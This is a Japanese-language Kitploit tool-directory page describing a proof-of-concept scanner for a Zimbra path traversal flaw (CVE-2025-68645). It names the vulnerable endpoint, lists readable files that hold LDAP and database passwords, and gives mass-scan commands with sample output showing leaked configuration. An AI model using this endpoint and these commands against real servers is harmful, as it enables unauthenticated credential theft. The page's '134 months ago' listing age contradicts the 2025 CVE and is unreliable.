Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Poc_CVE-2025-68645 — Zimbra Path Traversal (CVE-2025-68645) - Zimbra Collaboration Suite における未認証のファイル読み取り脆弱性 | Kitploit
ツール/GitHubGitHub/harisaidhin/poc_cve-2025-68645
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - Zimbra Collaboration Suite における未認証のファイル読み取り脆弱性

リポジトリを見る
134ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-68645 - Zimbra パストラバーサル脆弱性

Security CVE Python License Status

📋 概要

CVE-2025-68645 は、Zimbra Collaboration Suite におけるパストラバーサル脆弱性で、認証されていない攻撃者がサーバーのファイルシステムから任意のファイルを読み取ることを可能にします。

脆弱なエンドポイント

/h/printconversations?javax.servlet.include.servlet_path=

🎯 影響

影響深刻度
認証なしのファイル読み取り🔴 高
設定情報の開示🔴 高
認証情報の漏えい🔴 高
内部ネットワークのマッピング🟠 中

📁 読み取り可能なファイル

パス公開される情報
/WEB-INF/web.xmlサーブレットマッピング、セキュリティ制約
/WEB-INF/zcs.web.xmlZimbra固有の設定
/opt/zimbra/conf/localconfig.xmlLDAP認証情報、データベースパスワード
/opt/zimbra/conf/ldap-config.xmlLDAPサーバー設定
/opt/zimbra/conf/attrs/zimbra-attrs.xmlシステム属性
/WEB-INF/classes/logging.propertiesロギング設定

🚀 使用方法

単一ターゲットのスキャン

python CVE-2025-68645.py.py -t https://target.zimbra.com

大量スキャン

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

詳細オプション

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 コマンドライン引数

Argument Description Default -t, --target 単一ターゲットのURL None -l, --list ターゲット一覧を含むファイル None -o, --output 出力ファイル名 results.json --threads 同時実行スレッド数 10 --timeout リクエストタイムアウト(秒) 15 -v, --verbose 詳細出力を有効化 False --no-verify SSL検証を無効化 False --read-all すべての機密パスを読み取る False

📸 出力例

[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml

============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0

ツールをダウンロード